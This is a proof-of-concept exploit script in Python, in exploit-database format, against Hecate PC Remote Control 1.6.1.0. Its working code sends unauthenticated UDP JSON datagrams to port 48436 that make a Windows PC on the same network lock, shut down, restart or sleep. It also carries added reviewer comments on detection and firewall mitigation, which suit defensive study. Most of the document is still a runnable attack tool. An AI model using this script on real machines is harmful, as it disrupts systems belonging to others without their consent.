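# Exploit Title: Hecate - PC Remote Control 1.6.1.0 - Unauthenticated Remote System Control
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://risefall.org
# Software Link: https://apps.microsoft.com/detail/9mxqtf885mjp?hl=en-US&gl=US
# Version: 1.6.1.0
# Tested on: Windows 10

'''
Description:
Hecate - PC Remote Control 1.6.1.0 is vulnerable to unauthenticated system
control. An attacker on the same network can send crafted UDP packets to the
target without authentication, allowing them to remotely issue system-level
commands such as lock, shutdown, restart, and sleep.
'''

# Reviewer notes (defensive reading of this PoC):
# - Neither datagram carries a secret. "phoneId" is a UUID generated locally
#   below and the "init" payload is self-declared device metadata, so there is
#   no pairing code, token or signature for the service to check.
# - The script only calls sendto() and never reads a reply; the "[Sent]" lines
#   mean the datagram was handed to the OS, not that the target acted on it.
# - Detection: UDP datagrams to port 48436 whose JSON body has "command" set to
#   "init" followed by lockPc / shutdownPc / restartPc / sleepPc, arriving from
#   a source address or phoneId that is not a known paired phone.
# - Mitigation: scope the host firewall rule for this UDP port to the addresses
#   of the phones that are meant to control the PC, or remove the application
#   where that is not possible. This page names no fixed version.

import socket
import json
import uuid
import time
from datetime import datetime
import argparse
import sys

# Lab addresses hard-coded by the author. LHOST is only reported inside the
# "init" payload; it is not used to bind the sending socket.
LHOST = "192.168.8.100"
TARGET_IP = "192.168.8.105"
PORT = 48436

# Random client identifier, regenerated on every run (upper-cased UUID4).
PHONE_ID = str(uuid.uuid4()).upper()

# CLI action name -> "command" value placed in the JSON datagram.
VALID_COMMANDS = {
    "lock": "lockPc",
    "shutdown": "shutdownPc",
    "restart": "restartPc",
    "sleep": "sleepPc"
}


def send_packet(packet):
    """Serialize *packet* as JSON and send it as one UDP datagram.

    The datagram goes to (TARGET_IP, PORT). No response is awaited or read,
    so the printed "[Sent]" line confirms only the local send.

    Args:
        packet: dict with at least a "command" key; it must be JSON-serializable.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(json.dumps(packet).encode(), (TARGET_IP, PORT))
    print(f"[Sent] {packet['command']}")


def init_connection():
    """Send the "init" datagram that announces this client to the service.

    Every field is chosen by the sender: the identifier is PHONE_ID and the
    device description is made up. The payload has no credential field.
    """
    send_packet({
        "command": "init",
        "phoneId": PHONE_ID,
        "data": {
            "id": PHONE_ID,
            "brand": "ExploitDevice",
            "model": "Exploit",
            "platform": "Android",
            "ip": LHOST,
            "port": PORT,
            "connectedAt": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        }
    })


def send_control_command(action):
    """Send the control datagram mapped to *action*.

    Args:
        action: one of the keys of VALID_COMMANDS.

    Exits the process with status 1 when *action* is not a known key. From the
    command line argparse already rejects such values, so this branch only
    guards direct callers.
    """
    command = VALID_COMMANDS.get(action)
    if command is None:
        print(f"[-] Invalid action: {action}")
        sys.exit(1)

    send_packet({
        "command": command,
        "phoneId": PHONE_ID,
        "data": None
    })


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Hecate - Send unauthenticated control commands (lock, shutdown, restart, sleep)"
    )
    parser.add_argument(
        "--action",
        # A list keeps the original key order in the usage/help output.
        choices=list(VALID_COMMANDS),
        required=True,
        help="Action to perform on the target: lock, shutdown, restart, sleep"
    )
    args = parser.parse_args()

    print("[*] Initializing connection...")
    init_connection()
    # Fixed pause between the two datagrams; presumably gives the service time
    # to process "init" before the control command arrives (not confirmed here).
    time.sleep(2)

    print(f"[*] Sending '{args.action}' command...")
    send_control_command(args.action)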